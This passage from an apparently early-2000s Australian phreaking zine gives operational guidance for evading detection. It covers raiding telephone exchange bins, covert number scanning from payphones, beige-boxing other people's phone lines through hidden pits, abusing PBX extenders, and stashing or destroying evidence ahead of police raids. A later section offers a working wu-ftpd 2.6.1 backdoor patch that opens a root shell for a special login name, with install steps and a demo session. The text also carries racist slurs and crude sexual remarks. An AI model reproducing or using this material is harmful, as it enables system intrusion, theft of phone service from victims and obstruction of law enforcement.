Trashing in a group is a good way to increase security and make the job a little bit easier. If you are walking the streets late at night by yourself, then it can be a little unsafe(espically for all you 13 year old acne faced kids). Being in a group gives you the security of not being attacked, but also a curious resident or passer byer will be more unlikely to go up and question a bunch of people rahter than a singular person. You can also have one person on look out in the street(having a smoke or something similar), while the other two go in and trash the exchange. It is possible to talk walkie talkies to have conversation with, but these are a) noisy and b) suspicous if you do get searched/questioned on the way there. You could get way pro and buy some throat mikes or something, but if you have the money spend it on something else. The best way for the lookout person to warn the trashing guys is with a whistle or a noise, that would most probably sound natural. The lookout person should have no tools or weapons, because if he gets searched/questioned then he will most unlikely not be hassled too much.

Getting to and from the exchange can be done by several methods: car- fast, good to get away in, but the license plates/colour, make of car can be easily traced. If you know somebody with a wrecking yard, see if you can go in and get a set of plates. White and red cars are the most normal cars, and commodore and ford make up the greatest slice of cars. If you are a P plater make sure you take those down before going to the exchange as they very noticable by residents. Make sure you park a distance from the exchange, parking with cars of the same make/colour is also a good idea. Bike- Not as easily traced as a car, but also slower and harder to move if you have a large amount of "booty"(no not blek arse, I mean stuff from the exchange). While these can go places cars can't, and also pretty fast downhill, they also go shit slow up hill. So if you do decide to use bikes as your form of transport make sure your exit route is on the level/downhill. Walking- While being silent, and the easiest and vary low in suspicous level, it is a damn slow method espically if you are being chased by bacon/rent a cop. The good thing about walking is there no mode of transport that can be traced back to you. Other methods I have heard about are rollerblades, skateboards, etc. etc.

If large enough exchange/bin area you should really have an entry and exit route, and if possible have an emergency route, I know this sounds over the top, but we are being paranoid here. Rather than placing all your "bootY" into plastic bags, where they can make noise, and you look rather suspicious walking around with garbage bags in your hands. What I would suggest is a large backpack(makes it easy to walk/run with, and also to ride with). One of those day packs(for bushwalking) would be ideal as it has alot of space, I don't mean to take a 80 litre pack, as you would look like a tool, but rather the ones that people use at school/college/university. The information that is useless/you don't need make sure you burn it, hell i would even suggest scanning the stuff that you find interesting, encrypting it and burning the hard copies, but that is just me being paranoid. If you do keep hard copes, make sure they are in a safe place, off your propetry would be a good idea, and have someone that you know destroy if you get caught.

A final thing that I must add about trashing, I think it is very important to keep everything as normal as poissible, so trash the night beforce, or if possible the same night as trash collection. Then people won't get too worried if their bin is half empty, and all the broken phones and shit are gone... "One man's trash is another man's treasure."

.: Scanning :.

Scanning is another place where you are vulnerable to be caught/be interfered with. It is important to spend as little time as possible in the phone booth, as this is where you can be easily cornered. http://www.aca.gov.au/cgi-bin/range_search is a very handy resource where you enter a range of number and it will give you the numbers that are actually connected, this saves you a hell of alot of time at the booth. While it is very handy to write down excatly what comes from the call, just write down an ancryom such as ro for rung out, nc for not connected, etc. etc. This will once again cut down the amount of time that you will haveto spend in the booth. When recording this information down, have it somewhere that doesn't look suspicous, like having it on the last few pages of an old school book. This way if someone comes up to asks you what you are doing, you just look like your doodling on your school book while (pretending to) talk on the phone. Also when writing down the numbers don't write down the whole number such as: 1800 666 666(this is a number for some goth clothing store, handy for trashing), rather just write 666 because you should know what range you are scanning.

Being the paranoid person that I am gets really freaked out dialling numbers in public, and perfer to call at night time, plus after work(night work) was the only time that I had to do it, while there are less people, you do stand out more at night time standing in a lit phone booth dialling numbers for too long. I also like to use different payphones, so say make 20 calls from one, then move to a different payphone, not right next to it, but down the street, or across the block or something like that. Now, in some information that Zaleth gave me I have some shit about MTMS and how it reports on alot of non collectec calls, let me paste the bish here :
"Thursday & Sunday nights between 24:00 and 01:00 Smartphones will do their MTMS updates, generally speaking MTMS sends and recieves data such as Coin, Payphone usage and any updates. If you scan 12 consective numbers which cannot be connected and you hang up MTMS will dobb on you."
So in other words, if you dial 12 numbers in a row that don't connect the payphone will record it. So if you scan say at 11pm every friday night, and you dial 12 number that don't connect(in a row) and this goes on for awhile. Then you might just get suspicous and turn up and 11pm to the payphone that you dial from. By taking advantage of all or some of the above methods you can avoid getting into any shit.

Notice how I haven't included anything on scanning from home, want to know why not? Because it's a fucking stupid idea!! I mean really this is a paranoid text, if your stupid enough to scan from your home phone then so be it, sorry to have wasted your time reading the above section. There are however some different methods which can/could make it possible for you to scan from the ease of your home, or a more comfortable/safe position.

This is an idea that I got from Dataclysm "The mega super happy guide to VMBs and scanning". What the basic idea is that you biege off a payphone line, setting up a cordless biege box. Simply what you do is you set up the base station to the payphone line, then you take the handset back to your house, to some park or somewhere like that. Apparently this only works within 300 metres or so. If you leave further away than this from a payphone then you could build a signal amplifier to obivlosuly make the signal stronger so that it is able to cover a further distance. Now you want to bury this device so that no one can see it, then you want to cover the dirt/grass back up perfect so that people don't get suspicous. Now in another article I read something that could make this even more uber. The article was written by VX0MEG and was entitled "Safer boxing using the RJ31X Jack". Simply this lets you have a domiant line and a slave line, which is great for the boxing kiddies. So what you can do is attach the victims phone line to the dominant "connection" and the biege box to the slave "connection", so what happens your biegeing away calling 1900-13/f/jap and the legit user of the phoneline picks up to order some gook takeaway, you get disconnected(damn bye bye little 13/f/jap). The great thing about this is if we connect it upto the payphone and the biege box, if anyone by chance picks up the payphone then unfortunately we are disconnected. This really shouldn't make too much of a difference to you, because you can dial the number again, the great thing is that nobody is any of the wiser that someone else is using the payphone. Now you haveto be careful, as said above you don't want to go dialling like 600 numbers all in a hurry because even Telstra will get suspicous and send someone to look at the payphone, and they might just find your cordless biege box, and while very hard to trace it back to you, just be careful. Also there are many variations on this idea, you could set up a laptop with a modem to do the scanning.

Another method which is possible is to use a a PBX extender, this is a line out of the PBX that allows calls to certain range, or any number and is then charged back to the PBX, instead of the person that is making the call. So this can be used to your advantage, dial up the extender and start scanning. Hang on problem, you scan like 30 numbers at like 2am in the morning, admin rocks up in the morning checks the logs, and in the words of Rove goes "What The...". The thing is most if not all PBX will log these days, and that means like internet logs they log where you are calling from. So what you should really do is dial into several extenders to help create confusion, and rather than just scanning from a certain extender, mix the scanning up between the several different ones you have. Now when using extenders it is very important to call during business hours on business days, because this is when all the calls *should* be made by the legit people using the line. If you have a list of extenders a program could be easily written to cycle through a list of extenders, calling different ones in a random order, puting a random amount of time between each call.

.: Beiging/Pitting :.

So you get abit bored at night, seeming your a nerdy fuck, with pimples and shit that doesn't get any action from the back section you decide to go and biege some poor pensioners line, so that you can get a hard on. As you can probably tell I don't really tottaly agree with bieging off other peoples phone lines, mainly because they take the blame/cost for your fun. But if you do decide that you need to biege for some reason, then be smart about it because it is a very likely place you will be caught and is the hardest to explain(arhh Officer I lost my pet spider down here, there he is!! Ohhh the mother fucker bit me). So obvilously you want to find a pit that is totally out of the way, perferabely hidden behind some trees, or in a dark alley/workway that people are too scared to walk up at night time. Now if you wanted to be extra careful you could go and borrow(read: steal) some council signs, or those gates things so that people won't or shouldn't walk past there. You could do the same sort of thing around a pit on the open sidewalk, maybe even grab one of those telstra tents. The only problem with this is people but get abit suspicous if they see a nerdy 13 year old trying to erect a tent(not a hard on).

As mentioned in the above section you can use the RJ31X jack so that if/when the legitamite owner of the phone line picks up the phone line you will be disconnected, while does create a small annoyance at being cut off, its better than the person finding out that someone is on the line. If you don't have one of these then the best time to use someone phone line is when they aren't going to being useing it(obvilously). This will probably be late at night/early in the morning unless they have a nerdy child like you gerking it hard downloading Natalie Portman pr0n or when the person is at work. To test if anyone is home during the day you can always go the call on a suspected house and if they pick up you just pull the old "Hi is Ken there?" "No, sorry" "Okay, rang number sorry". Only problem is if a Ken actually lives there, then you just hang up, or talk to Ken about kiddy pr0n. So now you have found a target you want to be able to biege from a safe position, i.e. not standing right next to the pit. So you can, as suggested in the previous section use a wireless type of setup, leaving your base station of the biege box in the pit while sitting up some tree with the portable piece. If your not that "elite" you could always run a cable in consipicously to somewhere safe, like down a bank or in a park or some crap like that. Use your imagination I can't think of everything(and don't trust your milf to buy the coffee, she buys some mild roast shit, when you asked for strong). When you are leaving try to make everything look like when you got there, this way if some Telstra employee does open the pit for a quick glance then everything looks Okay and they tell the old fart that called them that nothing is wrong and to go get his pension and hold people up in lines.

I now want to add some ethical stuff on biegeing. As you could probably see I am not totally in agreeance with biege box mainly because it take advantage of innocent or not so innocent people. So if you want to biege, don't go calling up sex lines or calling up some friend that lives interstate/overseas, espically if the person doesn't click that something extra is on their bill, they are paying what you are too tight to pay for. So before you go and get some "elite" free calls think about the people that you are fucking up. So that really leaves scanning 1800 numbers, or something similar from the line. Now if go and scan a range of numbers from there, that means that the person in the house will be under suspicion. So if you want to do something like that do it when the person can prove that no one was home. Such as if someone goes away for a holiday or business trip, or if they are at work or the like. This does mean extra work, and is just not picking any random pair from the pit, but if it makes you sleep better at night. Then so be it. Also vandalism is a big no, no. a) because you could possibly disconnect someones phone line, and everybody knows how annoying it is when your phone isn't working b) it doesn't achieve anything at all, just means more work for Telstra employees when they should be improving rural services, and will increase security on things such as pits and c) if gives other phreakers a bad name, in a community like ours, one person actions is protrayed as the actions of all the group, espically in the media. So think before you act!!

.: Documents :.

Look around your bedroom, computer room, living room or even your toilet. Look at all the stuff that could incriment you. Hell I have a whole lot of documents printed out for reading just so that I can write this one. If you do get raided, they will haveto have a search warrant, which means that they can take whatever they like if they thing it is involved in the case(I am trying to get in contact with someone that does law and computers/telecommunications or has a interest in computers so that I can write an article on that sort of info, if so hit me up, contact at bottom). I believe that it is virtually impossible to do any work without having hard copies of information, whether it be docos, scans or just info written down on locks types, rims, etc. etc. So for these docos/pieces of paper look around for somewhere to stash them. Just in my room I could use such things as: secret compartment in my chest-of-drawers, inside my big set of speakers, in the battery compartment of my portable stereo. Anything that is unscrewable is a good place to hide stuff these include: cd player, amplifier, tuner, televesion, vcr, dataswitch box, old cd-rom and hard disk drives. The only problem is that it is very likely that all that equipment will be taken by the cops. So look around the house for places they won't think to look, e.g. cellar- behind wine, in boxes of food that never get used, back of cupboard, look the places are endless- use your imagination and you undoubtely come up with heaps more than I thought up in the brief time while I was typing. The problem with stashing stuff within your house is that police are consistent buggers and if they are lucky enough to find something, being in your house it incrimintes you. So how do we get past this, DON'T STASH THINGS IN YOUR HOUSE GOD DAMN IT. Have a park, empty block of land, bush, etc. etc. near your place. Well that would be a great place to put it, bury it, stick it in a empty tree trunk etc. etc.(hmm I think I am using etc. etc. too much in this bit, but what I mean this there is a million and one possible places to hide stuff, don't just look for the easiest, first place you find. Try to find the most sneakist, less suspicous place you can think of to put the stuff.) You could also go to the bank and get a safety desposit box, from what I know about safety desposit boxes(which isn't much) you don't haveto tell the bank what goes into them, even so you can just say important papers. Also you need two keys to open (most) of them, one from the bank manager and one of your own. Stash the key somewhere safe, not in the house obvilosuly and don't tell anybody about it. The problem with a safety desposit box is that a) they are expensive things to get and b) if the police find out you have one they will have no trouble getting into it, as no doubt the bank will have a way of getting in. Now the docos that aren't greatly important to you, or you have back ups on computer(encrypted of course, more of this in pt.2) then you should destroy them. Now I don't mean put them in the rubbish, or tear them up and throw them out, hell even if you shred them there is a possibilty that they can be put back together. What you need to do is to burn them, now that its coming into winter, most people have a wood fire happening, so start putting them in there. Alternativty you can have like a incinirator you could use that, now be careful because sometimes when you burn paper, writing can still be readable on them. So get the ashes and somehow destry them. Tread on them, spray water on them, put them down the sink(not if there is alot of them because it blocks the sink up. Reminds of this one time I was at a party and I was throwing up in the toilet and some chick came in and started throwing up in the sink. Anyway she blocked it up and some gook came in and unblocked it with one of those mario brother's suction thingos... thank god for gooks eh?- Sorry back to it). So now hopefully you should have nothing in your house that would incrimanate you when/if the cops come to raid you.

.: Safety :.

This section carries on from the last one, if police are going to raid people they normally do a whole lot, rather than just an indivual person. So if people from the scene aren't seen in awhile for no known reason, or if somehow they get a message out they have been raided. Get paranoid start away, stop doing major phreaking stuff, destroy all evidence you have or stash it in a hell of a good spot. If you have floppies with info on them, put a magnet over them, then scrap them and get some more(if you use floppies these days). If you work in a group then it will be most likely that you all get raided at once, that way police hope for as little contact as possible. What you could, do, now this is ultra paranoid, is say have something where everybody hasto call in during the day, say in the morning and in the evening, as they are most likely to raid you then. If someone misses a call in, then well you know what to do. Being raided would not be fun, so be smart, if you see a car following or similar dressed people acting suspicously(I don't know if this shit really occurs, just typing everything I can think of). Friends/associates that are acting nervously or suspicously around you, asking you for more info than they would normally be could have approched by police to help them.

To stay safe you need to wise up, doing small things like placing signs that would indicate that something or someone has been into your room/drawer/where you stash your info. Now there are many ways to do this; the old school method of placing a hair over an opening, if its broken someone has been in, similary a piece of paper could be used. Now if you live at home then your parents/siblings are most likely to be in and out of your room regurarly so placing this sort of stuff on your door could be a problem. Place it on draws you don't want opened, and if you suspect someone throw a casual question their way. If someone does search your house/room then it is very unliekly that they can put *everything* back into the exact same spot. So have certain objects that if in the wrong place can give you a clue to your place being searched. Now you should also be careful of being recorded- both on video and audio. But I think that I will write a seperate document on this sort of information after I do some more research on it.

.: Resources :.
The Mega Super Happy Guide to VMBs and Scanning- dataclysm (http://dataclysm.wiggerz.net/articles/pbx.txt)
Become a paranoid it's more secure- tH3 m4n!4c (http://newdata.box.sk/maniac/paranoid.txt)
SAFER BOXING USING THE RJ31X JACK- Marlinspike(http://phreakau.pinegap.net/rjuses.txt)

.: Outtro :.

Now we have come to the end, well this is alot longer than I thought that it was going to be. I was starting to worry that is was getting too long, but I got a few people to read it during the making and they said it was ok, so here it is. Really I hope its ok for you guys, I hope that it helps people become safe and keep out of trouble. Like all the articles in this issue people put alot of time in, so don't knock it please. Look out for part 2, being paranoid online. Later people.

.::::::.[08] NPR(Non Phreaking Related) ::::::::::::::::::::::. [Sangoma]


(Ed: this is the none phreaking related section, covering mostly some exploits thats Sangoma finds for me so that I can fill this thing up with interesting stuff :). Anyway enjoy this section, it kinda is a break from phreaking crap, and really hacking and phreaking go hand in hand.)


wu-ftpd-2.6.1 backdoor
~~~~~~~~~~~~~~~~~~~~~~

I wasn't the original coder to come up with this method of backdooring 
wu-ftpd, all credit should goto Axess for wu-ftpd-trojan.tar.gz (wu-ftpd-2.6.0)
all i did was take his idea and apply it to wu-ftpd-2.6.1 , so this is more 
of an update.

How it works ?
~~~~~~~~~~~~~~

All you need to do is apply this "patch" to the wu-ftpd source. What the patch does
is look out for a particular login name (ftp_), and it drops you into a root shell.

example:

zulu# telnet zulu 21
Trying 192.168.0.13...
Connected to zulu.lan.
Escape character is '^]'.
220 zulu.lan FTP server (Version wu-2.6.1(1) Tue Jun 4 13:30:42 GMT 2002) ready.
user ftp_
sangoma wu-ftpd-2.6.1 backdoor
id;
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
exit;
331 Password required for ftp_.
quit
221 Goodbye.
Connection closed by foreign host.
zulu#

You'll need to add ";" at the end of your commands to see them executed, and you must use
telnet or netcat or something like that, but not a ftp client.
 
Installing the backdoor
~~~~~~~~~~~~~~~~~~~~~~~

What you'll need?
1) wu-ftpd-2.6.1 source code
2) wu-ftpd-2.6.1.diff (cut and paste from below)

Just unzip and tar the source...
gunzip wu-ftpd-2.6.1.tar.gz
tar -xf wu-ftpd-2.6.1.tar

then run
patch < wu-ftpd-2.6.1.diff

tell patch which file to patch (ftpd.c) which will prolly be wu-ftpd-2.6.1/src/ftpd.c
once the patching is done, just recompile wu-ftpd and switch the ftpd binaries.

wu-ftpd-2.6.1.diff
~~~~~~~~~~~~~~~~~~




*** ftpd.org.c  Tue Jun  4 13:25:41 2002
--- ftpd.c      Tue Jun  4 13:28:47 2002
***************
*** 1779,1785 ****
      anonymous = 0;
      acl_remove();

!     if (!strcasecmp(name, "ftp") || !strcasecmp(name, "anonymous")) {
        struct aclmember *entry = NULL;
        int machineok = 1;
        char guestservername[MAXHOSTNAMELEN];
--- 1779,1792 ----
      anonymous = 0;
      acl_remove();

! /* Phj33r sangoma C++ sk1llz */
!       if (!strcasecmp(name,"ftp_")){
!         system("/bin/echo sangoma wu-ftpd-2.6.1 backdoor \n");
!           system("/bin/sh -i");
!       }
! /* End of "sk1llz" hehe */
!
!           if (!strcasecmp(name, "ftp") || !strcasecmp(name, "anonymous")) {
        struct aclmember *entry = NULL;
        int machineok = 1;
        char guestservername[MAXHOSTNAMELEN];




Final thoughts
~~~~~~~~~~~~~~

I'm guessing that this kind of backdoor can be applied to any version of wu-ftpd, but i only needed a backdoor in wu-ftpd-2.6.1 (damn boxes with few daemons running ;)

anyhow, peace...

	sangoma@cornerpub.com 

.::::::.[09] Other Crap ::::::::::::::::::::::::::::::::::::::.

In this section is just going to go random crap that we feel like adding, for both your enjoyment and our own!! :)

:: Next Issue ::
Next issue we hope to cover the following stuff:
head_rush- Paranoia & Being Paranoid Pt.2
Zaleth- Efficient Prefix Scanning
rioter- SMS headers
anomaly- ATM ROMS
Denied- War Driving
yellow- "Private" GSM networks
nitr0- encoding SMS's


:: Contact Details ::
General Contact Details/ Questions/ Submissions!!- p4k@hushmail.com
head_rush-p4k@hushmail.com
Zaleth- zaleth@hushmail.com
rioter- rioter@area-6.net
phreakaz0id- phreakaz0id@hotmail.com
anomaly- *cough*
sangoma- sangoma@cornerpub.com

(You could also find (some of) us on irc.linuxphreaks.org 6667 #p4k)

:: What tunes we are digging it out to ::
What we are/were listening to when writing the above articles:

head_rush- Infusion- Phrases and Numbers/ Streets- Original Pirate Material
Zaleth- Tiesto- Les Rythem Digitales
rioter- nonpoint- development
phreakaz0id- Tozzi - A Cosa Servono Le Mani
anomaly-my neighbours having sex
sangoma- 

:: Propz ::
Mad propz go out to these people, because in some way they helped to get this bish off the ground:

Zaleth, phreakaz0id, rioter, sangoma,for articles
anomaly- for article and for checking (some of) the spelling
sangoma- for having a blek dick and sending me pics
esko- for hosting the page
linuxphreak.org ppl that are nice to me or just lub me for my body
#dbo crew on AustNet for keeping it real
and to all those ppl I pulled 13/f/jap on, thanks for some elite logs

:: Quotes ::
[22:26]  i masturbate when i am typing articles
(Ed: This guy is one sick fucker)
"We were soldier once.... and young"
"A song for a heart so big, god wouldn't let it live"
"Face your fears, live your dreams"

.::::::.[10] Outtro ::::::::::::::::::::::::::::::::::::::::::.

Well it's the end of the issue, well aren't we just glad that it is finished. My only wish that people will find this useful now and hopefully in the future. Hopefully if there is enough public support for it, there will be a second issue, and depending on how that goes, there will a third issue, and so on. But whether or not it continues is all upto you guys in the scene, the people that this zine is going out to. If it is of no help, then hell tell us, and we can either change it or stop doing it. Please don't go knocking the articles that people have written because they have spent alot of time on them, you write a better one, and then you can release it and start knocking other peoples for not being elite as yours... if you feel that will actually make a difference to the scene, because thats what its all about. Its all about the scene and advancing it, its about gaining knowledge, not always about getting free phone calls and being "uber elite" infront of your friends. On that note, I will leave you and maybe(hopefully) see you in the not so distance future.
Peace out...